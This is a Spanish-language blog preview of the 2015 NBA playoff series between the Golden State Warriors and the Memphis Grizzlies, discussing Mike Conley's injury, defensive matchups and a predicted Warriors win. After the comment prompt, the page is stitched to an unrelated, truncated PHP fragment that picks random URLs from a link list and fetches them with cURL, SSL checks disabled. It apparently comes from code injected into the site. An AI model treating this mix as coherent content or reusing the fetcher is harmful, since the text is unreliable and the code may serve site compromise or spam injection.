Previa Warriors vs Grizzlies

02 de May de 2015 por TheDeerHunter

Observamos ciertos puntos en común con la anterior eliminatoria de los Grizzlies. En condiciones normales bien podríamos estar ante una final de conferencia anticipada. Los de Memphis fueron los que mejor lograron aguantar el paso de los Warriors durante buena parte de la regular, hasta que experimentaron el bajón del último tramo. En sus enfrentamientos previos se produce una victoria a los puntos, de 2 a 1, a favor de los Warriors. No obstante las virtudes mentales/defensivas del equipo de Joerger suelen florecer en este tipo de momentos, a vida o muerte, siendo un grupo pensado para ser capaz de defender a cualquiera e incluso poner nervioso al mejor ataque de largo de la liga.

Marc Gasol y Stephen Curry

Así todo son las hipotéticas ausencias las que podrían condicionar el desarrollo de la serie. Por un lado Steve Kerr podría recuperar a un ex all star como David Lee para la causa en esta serie. Está por ver qué uso le daría el técnico, pues el puesto está cubierto con absolutas garantías por Draymond Green. Es evidente que Lee ha dejado de ser imprescindible en este equipo, pero aún es perfectamente aprovechable tanto como alternativa táctica a Green como para desgastar a Randolph. No se podrá quejar Kerr de malas cartas en su mano.

Por el otro, y esta presencia sí es crítica, tenemos la duda de Conley. En la serie contra Blazers sufrió un fortuito golpe en el rostro que le mandó al quirófano y le dejó fuera de servicio para el resto de la eliminatoria y quién sabe si para el comienzo de esta. Los Grizzlies podrían deducir tras su experiencia ante un gris Lillard qué es lo que podría ocurrir ante el mejor base del año. Aunque Joerger tampoco se puede quejar de especialistas defensivos, no existen alternativas buenas para cubrir la hipotética baja de Conley. Podría colocar a un perro de presa como Tony Allen sobre él, pero Curry sigue siendo mucho más rápido y ligero. El agujero seguiría existiendo y dejaría además a Thompson sobre un defensor más pequeño como es Courtney Lee. La otra alternativa sería que el propio Lee, inferior a Allen en este sentido, se encargue de Curry, aunque en cualquier caso nadie puede imaginar defensor más apropiado para “el artista” que Conley, y aun así siempre hay que esperar un roto por ese lado. Además tampoco se puede ignorar que es el mejor tirador que tienen y que los Warriors tampoco se chupan el dedo defensivamente. El papel de Conley como liberador de sus interiores no lo pueden suplir remotamente ni Udrih, ni Calathes. Joerger debería rezar por contar con su base titular en condiciones óptimas para este choque, de otra forma mucho nos tememos que el duelo será desigual.

Incluso contando con la hipotética presencia de Conley, los Warriors son favoritos sobre el papel. Está sobradamente demostrado que la plantilla que maneja Kerr no tiene comparación con ninguna otra y este año se les ve casi intocables. Los Grizzlies son un bloque que brilla más por esfuerzo y cohesión que por los nombres de sus integrantes, con una segunda unidad muy discreta en comparación. No debe de ser algo que quite demasiado el sueño a los “Osos” pues son los típicos gladiadores que solo conocen el favoritismo que se gana en la cancha. Sin embargo la configuración pesada de los Grizzlies puede no digerir del todo bien las alternativas más ligeras de sus rivales, con un juego en transición de los más letales que se pueden concebir en este deporte. Con o sin Conley será un duro examen para el frontcourt de los Grizzlies. Si quieren disponer de alguna opción Marc deberá marcar diferencias contra un duro hueso como es Bogut. Zach deberá imponer su tamaño frente a la versatilidad de Draymond Green y Jeff Green deberá hacer notar su poder físico más de lo que ha hecho hasta ahora.

Los Grizzlies tratarán de alargar la eliminatoria y llevarla a la trinchera. Es mejor opción. Los Warriors, por su parte, no se pueden permitir “dormitar” como hicieron en algunos tramos contra los Pelicans. Si esperan remontadas como las que vimos en la anterior serie lo tienen muy crudo.

Con todo, los campeones de la regular este año, el equipo que acumula más de 70 victorias, el mejor ataque de la liga con el mejor jugador… debería imponer su mayor talento y fondo de armario en 5 o 6 partidos.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>